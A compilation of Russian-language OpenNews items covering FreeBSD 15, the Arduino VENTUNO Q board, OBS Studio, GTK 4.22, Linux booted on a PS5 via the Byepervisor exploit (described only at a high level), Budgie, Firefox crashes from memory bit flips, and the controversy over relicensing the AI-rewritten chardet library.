• Добавлен исполняемый файл sbin/ipfw15, собранный с новым KBI (Kernel Binary Interface) для совместимости с ядром FreeBSD 15. Оригинальная утилита ipfw сама определяет наличие нового KBI и запускает ipfw15 при необходимости для корректной загрузки правил пакетного фильтра при обновлении до FreeBSD 15.
• Объявлена устаревшей и намечена для удаления поддержка протокола маршрутизации RIP (routed, rtquery, route6d, rip6query). Вместо routed рекомендовано использовать пакеты 'bird' или 'quagga' из коллекции портов.
• Объявлена устаревшей встроенная в ядро реализация MIDI-секвенсора.
• Удалён код для совместимости с версиями пакетного фильтра ipfw, поставлявшимися до выпуска FreeBSD 8.

1. OpenNews: В спецификации OCI Runtime 1.3 появилась поддержка FreeBSD
2. OpenNews: Релиз FreeBSD 15.0
3. OpenNews: ChaosBSD - форк FreeBSD для тестирования драйверов
4. OpenNews: Выпуск Rust 1.94. Эксперименты с Rust в ядре FreeBSD. СУБД Turso и САПР vcad на Rust
5. OpenNews: Удалённая root-уязвимость в обработчике автоконфигурации IPv6 во FreeBSD

В качестве примеров применения VENTUNO Q упоминается создание роботов, умных киосков, анализаторов потоков трафика, ассистентов для слежением за здоровьем, систем контроля за качеством на предприятиях. При подключении монитора, клавиатуры и мыши плату можно использовать в качестве рабочей станции разработчика, поддерживающей запуск Arduino App Lab. Устройство совместимо с платами расширения и дополнениями, уже выпускаемыми для плат Arduino UNO. Дата поступления в продажу и стоимость VENTUNO Q пока не объявлена.

Микропроцессор Qualcomm Dragonwing IQ8 (IQ-8275) включает в себя 8-ядерный CPU Arm Cortex, GPU Arm Cortex A623 (877 MHz), процессор обработки изображений (ISP) Qualcomm Spectra 692 и AI-ускоритель (NPU) Hexagon Tensor AI с заявленной производительностью 40 триллионов операций в секунду. Система оснащена 16 ГБ ОЗУ и 64 ГБ eMMC-накопителем. Для расширения постоянной памяти доступен коннектор M.2 для накопителей NVME Gen.4. Заявлена поддержка запуска Ubuntu и Debian.

Микроконтроллер STM32H5F5 включает в себя ядро Arm Cortex M33 250MHz, 4 МБ Flash и 1.5 МБ ОЗУ. Поддерживается запуск RTOS Zephyr, обеспечена полная совместимость с операционной системой ROS 2 (Robot Operating System 2) и инструментарием Arduino App Lab. Для подключения периферийных устройств, датчиков и шаговых двигателей предусмотрены интерфейсы GPIO, PWM и CAN-FD.

Кроме того, плата оснащена Wi-Fi 6 2.4/5/6 GHz, Bluetooth 5.3, 2.5Gbit Ethernet (RJ45), HDMI для подключения монитора, MIPI DSI для подключения сенсорных экранов и интерактивных панелей, тремя коннекторами MIPI CSI для камер, USB-C с поддержкой подключения монитора и камеры, двумя USB 3.0 Type A, двумя USB 3.0, аудиовыходом. Размер 160 x 100 x 25.8 мм.

Подразумевается, что микропроцессор Qualcomm Dragonwing IQ8 используется для запуска управляющей операционной системы и выполнения AI-моделей, а микроконтроллер STM32H5F5 отвечает за управления двигателями и реагирования на информацию с датчиков в реальном времени. Для взаимодействия с микроконтроллером из Linux предоставляется готовая RPC-библиотека (Remote Procedure Call).

Для NPU предлагаются готовые библиотеки для локального выполнения моделей машинного обучения, такие как Qwen для локальной обработки запросов на естественном языке, Qwen VLM для распознавания текста, определения объектов на изображениях и описания сцены, Melo TTS и Whisper для распознавания речи и формирования транскрипции, MediaPipe для распознавания управляющих жестов и отслеживания движения рук, YOLO-X для отслеживания движения людей, машин и объектов перед камерой, PoseNet для определения позы человека.

1. OpenNews: Представлена плата Arduino UNO Q с 4ГБ ОЗУ и 32ГБ eMMC
2. OpenNews: Выпуск WebThings Gateway 2.0, шлюза для умного дома и IoT-устройств
3. OpenNews: Qualcomm поглощает Arduino. Представлены плата Arduino UNO Q и среда разработки Arduino App Lab
4. OpenNews: Новая версия среды разработки Arduino IDE 2.3
5. OpenNews: Выпуск свободной операционной системы реального времени Zephyr 1.8

Целью разработки OBS Studio было создание переносимого варианта приложения Open Broadcaster Software (OBS Classic), не привязанного к платформе Windows, поддерживающего OpenGL и расширяемого через плагины. Отличием также является использование модульной архитектуры, подразумевающей разделение интерфейса и ядра программы. Поддерживается перекодирование исходных потоков, захват видео во время игр и стриминг в PeerTube, Twitch, Facebook Gaming, YouTube, DailyMotion и другие сервисы. Для обеспечения высокой производительности возможно использование механизмов аппаратного ускорения (например, NVENC, Intel QSV, Apple Video Toolbox и VAAPI).

Предоставляется поддержка композитинга с построением сцены на основе произвольных видеопотоков, данных с web-камер, карт захвата видео, изображений, текста, содержимого окон приложений или всего экрана. В процессе вещания допускается переключение между несколькими предопределёнными вариантами сцен (например, для переключения представлений с акцентом на содержимое экрана и изображение с web-камеры). Программа также предоставляет инструменты для микширования звука, фильтрации при помощи VST-плагинов, выравнивая громкости и подавления шумов.

Ключевые изменения:

• Добавлен новый интерфейс для микширования звука (Audio Mixer).
• Добавлена поддержка Simulcast через WebRTC.
• Добавлена поддержка отката изменений (undo/redo) для таких операций, как режимы смешивания и деинтерлейсинга.
• В obs-websocket добавлена начальная поддержка работы холстами (Canvases) - объектами, содержащими сцены и определяющими методы их отрисовки.
• В источнике вещания на базе браузера (Browser Source) повышена безопасность работы с локальными файлами.
• В менеджере плагинов реализована возможность включения/отключения отсутствующих плагинов.
• Отключена анимация в панели.
• Битрейт по умолчанию изменён на 6000 kbps.

1. OpenNews: Выпуск системы потокового видеовещания OBS Studio 32.0
2. OpenNews: OBS Studio и Fedora урегулировали конфликт
3. OpenNews: В TikTok Live Studio выявлено заимствование кода OBS, нарушающее лицензию GPL
4. OpenNews: Выпуск серверов для потокового вещания Roc 0.1, Ant 1.7 и Red5 1.1.1
5. OpenNews: Выпуск сервера потокового вещания Icecast 2.5

Среди заметных улучшений в GTK 4.22:

• Добавлена встроенная система отрисовки и разбора изображений в формате SVG, поддерживающая анимацию и дающая возможность создания анимированных пиктограмм, интерактивных элементов интерфейса и динамически меняющихся индикаторов, таких как индикаторы прогресса. GtkSvg напрямую интегрируется с библиотекой GSK (GTK Scene Kit), предоставляющей возможности отрисовки графических сцен через OpenGL и Vulkan. Библиотека librsvg, ранее используемая для отрисовки SVG-пиктограмм, удалена из числа зависимостей.

  Для работы с форматом SVG предложен класс Gtk.Svg, позволяющий обойтись без внешних зависимостей при отрисовке векторных пиктограмм и ресурсов для приложений. Предложенная реализация формата SVG разработана специально для GTK и успешно проходит 1250 из 1616 тестов совместимости из набора resvg (для сравнения, Firefox проходит 1385 тестов, librsvg - 1168, а QtSvg - 591).

• Добавлен виджет GtkPopoverBin, упрощающий добавление контекстных меню и выпадающих диалогов в другие виджеты. GtkPopoverBin может использоваться как контейнер для интеграции функциональности всплывающих окон в виджеты, которые сами по себе не умеют это делать.
• Добавлен новый тип выражений GtkTryExpression, допускающих определение fallback-операций. GtkTryExpression пытается выполнить каждое выражение из списка, до тех пор пока одно из них не будет выполнено успешно.
• Задействован новый формат символьных пиктограмм, поддерживающий анимацию и меняющиеся состояния (например, для индикации активности). Для управления шириной пиктограмм добавлено CSS-свойство "-gtk-icon-weight". Добавлено демонстрационное приложение org.gtk.Shaper с реализацией редактора для нового формата символьных пиктограмм.
• В бэкенде для работы в окружениях на базе протокола Wayland реализована экспериментальная поддержка протокола xx-session-management, который может использоваться для восстановления состояния окон прерванных сеансов (например, после аварийного завершения композитного менеджера). Для включения следует выставить переменную окружения "GDK_DEBUG=session-mgmt".
• В API GtkApplication добавлена возможность сохранения состояния, используя протокол xx-session-management. В GNOME 50 данная функциональность задействована для сохранения сеансов и восстановления позиций окон.
• Для доступа к настройкам в бэкенде для Wayland задействован портал freedesktop.portal.Settings.
• В API GtkFileLauncher реализована возможность доступа к файлам на запись, при использовании внутри flatpak-пакетов.
• В GSK (GTK Scene Kit) добавлена поддержка профилирования и возможность смещения пикселей исходного изображения на основе "карты смещения" (displacement map) для создания сложных графических эффектов.
• Добавлен API GskRenderNodeReplay для обработки дерева узлов отрисовки (Render Node).
• Добавлены новые типы узлов отрисовки "copy" и "paste", позволяющие скопировать и вставить область под текущим элементом в другое место графа сцены.
• Добавлен новый тип узлов отрисовки "composite", позволяющий использовать дополнительные операции композитинга при отрисовке элементов поверх фона, такие как наложение с использованием маски.
• В CSS добавлено свойство "backdrop-filter" для применения эффектов к фоновой области, таких как размытие фона.
• В CSS добавлена поддержка настройки "reduced-motion", информирующей о необходимости минимизировать использование анимации.

1. OpenNews: Доступен графический тулкит GTK 4.20
2. OpenNews: Доступен порт GTK+ 1.3 для Windows 11
3. OpenNews: В Debian 14 намерены прекратить поставку GTK2
4. OpenNews: Эксперимент по использованию AI для перевода приложения с GTK2 и OpenGL на GTK4 и Vulkan
5. OpenNews: Ardour прекратил поддержку сборки с GTK2 в пользу форка YTK

В подготовленной системе на базе ядра Linux 6.19 полностью работает звук и видео с качеством 4K через HDMI, а также поддерживаются все USB-порты. Рабочая конфигурация запущена с выставлением для CPU частоты 3.2 GHz, а для GPU - 2.0 GHz. Отмечается, что частота может быть дополнительно разогнана до 3.5 GHz для CPU и 2.23 Ghz для GPU, но в этом случае игровая консоль PS5 Slim быстро перегревалась.

Для обхода верификации загрузчика и загрузки Linux-дистрибутива вместо штатной прошивки задействован эксплоит Byepervisor, работающий только со старыми версиями прошивок (1.xx-2xx) и эксплуатирующий две уязвимости в гипервизоре. Для поддержки GPU AMD, специфичного для PlayStation 5, подготовлен патч для Mesa, который предложен для включения в основной состав Mesa.

В Sony Playstation 5 используется APU AMD со встроенным сопроцессором PSP (Platform Security Processor), обеспечивающим управление ключами. На первой стадии загрузки запускается доступный только на чтение код из BootROM, использующий корневые ключи для верификации загрузчика по цифровой подписи, жёстко прошитые на этапе производства чипа. Если верификация прошла успешно, на второй стадии запускается загрузчик (Bootloader), который отвечает за запуск и верификацию ядра ОС или гипервизора.

При использовании эксплоита Byepervisor вмешательство в работу для запуска Linux производится на стадии гипервизора. На первом этапе для запуска собственных исполняемых файлов в формате ELF на уровне основной прошивки применяется эксплоит UMTX, эксплуатирующий WebKit при обработке web-контента, или эксплоит, эксплуатирующий уязвимость в обработчике BD-J при вставке специально оформленного диска Blu-ray. На втором этапе через загрузчик запускается эксплоит byepervisor.elf, переводящий систему в состояние восстановления прошивки.

1. OpenNews: Утечка BootROM-ключей Sony Playstation 5
2. OpenNews: Выпуск PCSX2 2.6.0, эмулятора Sony Playstation 2
3. OpenNews: Компания Sony опубликовала Linux-драйвер для игрового контроллера PlayStation 5 DualSense
4. OpenNews: Опубликован эксплоит для выполнения кода на уровне ядра Sony PlayStation 4
5. OpenNews: Sony выплатит пользователям компенсацию за прекращение поддержки Linux в PlayStation 3

Основу Budgie составляет панель, близкая по организации работы к классическим панелям рабочего стола. Все элементы панели являются апплетами, что позволяет гибко настраивать состав, менять размещение и заменять реализации основных элементов панели на свой вкус. Среди доступных апплетов можно отметить классическое меню приложений, систему переключения задач, область со списком открытых окон, просмотр виртуальных рабочих столов, индикатор управления питанием, апплет управления уровнем громкости, индикатор состояния системы и часы.

Среди изменений в новой версии:

• Улучшена интеграция с композитным менеджером Labwc. Расширены возможности прослойки для трансляции универсальных настроек среды рабочего стола в настройки, специфичные для Labwc. В конфигуратор Budgie Desktop Settings добавлена возможность независимого выбора тем декорирования окон Labwc.

  Переделана трансляция в Labwc настроек, связанных с раскладкой клавиатуры и локалью. Добавлена поддержка интерфейса FreeDesktop locale1 для определения раскладки клавиатуры через сервис systemd-localed с возможностью отката на получение конфигурации через /etc/default/keyboard. Реализована трансляция параметров прокрутки для тачпадов из конфигурации GNOME в файл конфигурации Labwc.

  
• Добавлен класс ApplicationMatcher с реализацией различных стратегий сопоставления окон с ярлыками на панели и рабочем столе, позволивший решить проблемы с определением, закреплением и группировкой окон нестандартных приложений, таких как ilix, jEdit, snaps и Proton Pass. При сопоставлении теперь учитываются такие параметры, как имена Java- и snap-пакетов, а также выполняется проверка без учёта регистра символов.
• Улучшен выбор размера меню приложений (Budgie Menu) на экранах с различным разрешением и плотностью пикселей. Убрана лишняя логика масштабирования, приводившая к проблемам из-за повторного масштабирования композитным менеджером. Высота меню теперь выбирается как 35% от высоты рабочей области, но ограничивается диапазоном от 480 до 600 пикселей, что приводит к хорошему результату как на экранах 4K, так и на дисплеях с низким разрешением.
• Переработаны апплеты для формирования рабочего стола (Show Desktop), которые переведены на использование надлежащих интерфейсов DBus. Решена проблема с работой комбинации клавиш Super+D. Обеспечено отслеживание сворачивания окон во время отображения рабочего стола для последующего раскрытия только их при нажатии кнопки раскрытия всех окон.
  
  
• Добавлена поддержка разных режимов выставления фокуса в диалогах Run и Power при помощи мыши. Функция скрытия при потере фокуса теперь активируется только если курсор мыши находится в области диалога, что решило проблему с исчезновением диалога в момент переключения фокуса.
  
  
• Добавлена поддержка панели Crystal Dock, запущенной поверх композитных серверов на базе библиотеки wlroots.
• В budgie-screenshot обеспечено запоминание пути сохранения скриншотов между сеансами.

1. OpenNews: Выпуск среды рабочего стола Budgie 10.10.1
2. OpenNews: Среда рабочего стола Budgie переходит с GTK на Qt и KDE Frameworks
3. OpenNews: Доступна среда рабочего стола Budgie 10.10, переведённая на Wayland
4. OpenNews: В среде рабочего стола Budgie 10.10 будет оставлена только поддержка Wayland
5. OpenNews: Рабочий стол Budgie переходит с GTK на библиотеки EFL от проекта Enlightenment

Указано, что эта лишь консервативная эвристика, занижающая показатели, а реальное число сбоев из-за проблем с памятью может достигать 10%. Иными словами, до 10% всех аварийных завершений работы Firefox вызваны не ошибками в коде, а аппаратными дефектами. Если не учитывать сбои из-за проблем, связанных с исчерпанием доступной памяти, то доля крахов из-за искажения битов памяти достигает 15%.

Для подтверждения сбоев из-за искажения битов разработан инструментарий проверки корректности работы оперативной памяти, запускаемый на системах пользователей после аварийного завершения. Для подкрепления гипотезы о значительном влиянии дефектов памяти на сбои, пользователям было предложено выполнить тестирование памяти. На каждые два падения, которые предполагалось, что вызваны искажением битов памяти, тест памяти выявлял одну реальную аппаратную проблему, при том что тестирование проводилось не больше 3 секунд и охватывало только первые 1 ГБ памяти.

1. OpenNews: Phoenix - атака на чипы DDR5, приводящая к искажению содержимого памяти
2. OpenNews: FlippyRAM - дистрибутив для тестирования атаки Rowhammer
3. OpenNews: Mayhem - атака, искажающая биты в памяти для обхода аутентификации в sudo и OpenSSH
4. OpenNews: ZenHammer - метод атаки для искажения содержимого памяти на платформах AMD Zen
5. OpenNews: GPUHammer - вариант атаки Rowhammer на память GPU

К обсуждению данного действия присоединился пользователь, который представился Марком Пилгримом (Mark Pilgrim), первоначальным создателем библиотеки (к сожалению учётная запись этого пользователя пустая и проверить является ли он тем кем представился невозможно), и заявил, что у Дэна нет прав изменять лицензию проекта. Марк поставил под сомнение то, что новая ветка была создана с использованием метода "чистой комнаты", при котором для исключения нарушения авторских прав аналогичный продукт формируется на основе спецификаций и без доступа к исходному коду оригинала. По мнению Марка, добавление модного AI-генератора кода в процесс разработки не даёт права на смену лицензии.

Дэн возразил, что он сравнил разные версии при помощи библиотеки для обнаружения плагиата JPlag и сходство между версиями 7.0.0 и 6.0.0 составило 1.29%, а между версиями 1.1 и 7.0 - 0.64%. По словам Дэна, ни один файл в кодовой базе версии 7.0.0 не похож по структуре ни на один файл из любого предыдущего релиза. Новая ветка развивалась в отдельном пустом репозитории без доступа к старому дереву исходного кода. Кроме того, AI-агенту Claude была дана явная инструкция не основываться при разработке на коде, поставляемом под лицензиями LGPL и GPL.

Дэн также указал, что так как он уже более 10 лет занимается сопровождением проекта, он не мог полностью выполнить все требования метода "чистой комнаты", который предполагает жёсткое разделение между людьми, знакомыми с оригиналом, и теми, кто пишет новую реализацию. Поэтому для того, чтобы подтвердить, что новый код не является производным от оригинала, он воспользовался доказательством структурной независимости кода.

Дэн рассказал, что хотел, чтобы библиотека chardet была включена в стандартную библиотеку Python, так как она является ключевой зависимостью для множества проектов на Python. Но интеграции мешали три препятствия - лицензия, скорость и точность. В результате проведённой работы скорость обнаружения кодировки библиотекой увеличилась в 48 раз. Для проекта, который активно используется во многих других проектах, данная оптимизация приведёт к заметному повышению производительности для миллионов пользователей (пакет загружается около 130 миллионов раз в месяц).

Зои Койман (Zoë Kooyman), исполнительный директор Фонда свободного программного обеспечения, сообщила изданию The Register, что не может комментировать конкретные детали или законность проекта без проведения дополнительных исследований или консультаций с юристами, но нет ничего "чистого" в том, чтобы большая языковая модель (LLM) использовала код, который от неё требуют переписать.

При этом Зои решила дать моральную оценку поступку Дэна: "Что касается смысла GPL, то пермиссивная лицензия технически всё ещё является лицензией свободного программного обеспечения, но подрыв копилефта - это серьёзный поступок. Отказ предоставить другим права, которые вы сами получили как пользователь, является крайне антисоциальным, независимо от используемого метода."

Брюс Перенс (Bruce Perens), автор оригинального определения открытого исходного кода, считает, что воссоздание кода при помощи AI убивает экономику разработки программного обеспечения. По мнению Брюса, было бы правильным, если бы тренировка AI-моделей и весь выдаваемый моделями вывод изначально рассматривались как копирование, но в реальности сложилась иное отношение и его уже не переломить. Брюс считает, что грядут кардинальные изменения экономики и процессов, связанных с разработкой ПО, сравнимые с изменениями после изобретения печатного станка.

Парадигмы открытого и проприетарного ПО полностью изменятся в условиях, когда за несколько дней при помощи AI можно сгенерировать готовый продукт, способный конкурировать с системами, на разработку которых потрачены десятки лет. Многие проприетарные компании, зависящие от сохранения закрытых разработок, которые можно легко клонировать, окажутся нежизнеспособны, и вероятно останутся только те, разработки которых проблематично воспроизвести.

Армин Ронахер (Armin Ronacher), создатель фреймворка Flask, считает, что код, поставляемый под копилефт-лицензиями, подобными GPL, и раньше можно было переписать с нуля и начать распространять под другой лицензией. Разница лишь в том, переписан код вручную или автоматически при помощи AI. При этом пока не ясно, какой уровень участия человека требуется для того, чтобы код, созданный с помощью AI, подпадал под защиту авторского права. В этом, по мнению Армина, ключевой вопрос.

Недавно Верховный суд США отказался пересмотреть дело "Талер против Перлмуттера", в котором истец пытался отменить решение нижестоящего суда, согласно которому он не мог защитить авторским правом изображение, созданное искусственным интеллектом. Верховный суд США оставил в силе решение суда нижней инстанции о том, что произведения, полностью созданные AI, не защищаются авторским правом. В связи с данным решением возникло опасение о возникновении проблем при использовании кода, сгенерированного через AI в открытых проектах. Не ясно, насколько активно должен использоваться AI при разработке, чтобы суд отказал в удовлетворении претензии на авторские права на код из‑за уменьшения вклада человека в разработку.

Юридические последствия применения большой языковой модели для переработки как открытых, так и проприетарных проектов (у которых был похищен исходный код) трудно предсказуемы и сильно зависят от прецедентов, создаваемых судами. Тем не менее, если большая языковая модель переписывает код на язык программирования, отличный от оригинала, то доказать создание производной работы становится практически невозможно.

1. OpenNews: Копилефт лицензия CCAI, учитывающая применение для обучения AI-моделей
2. OpenNews: GitHub заблокировал репозиторий Rockchip после жалобы о перелицензировании кода FFmpeg
3. OpenNews: AI-бот начал травлю сопровождающего из-за дискриминации при приёме AI-изменений
4. OpenNews: Утечка в Git-репозитории конфиденциальных данных, накопленных AI-ассистентами
5. OpenNews: Сопровождающие Godot перегружены из-за обилия сомнительных изменений, созданных с помощью AI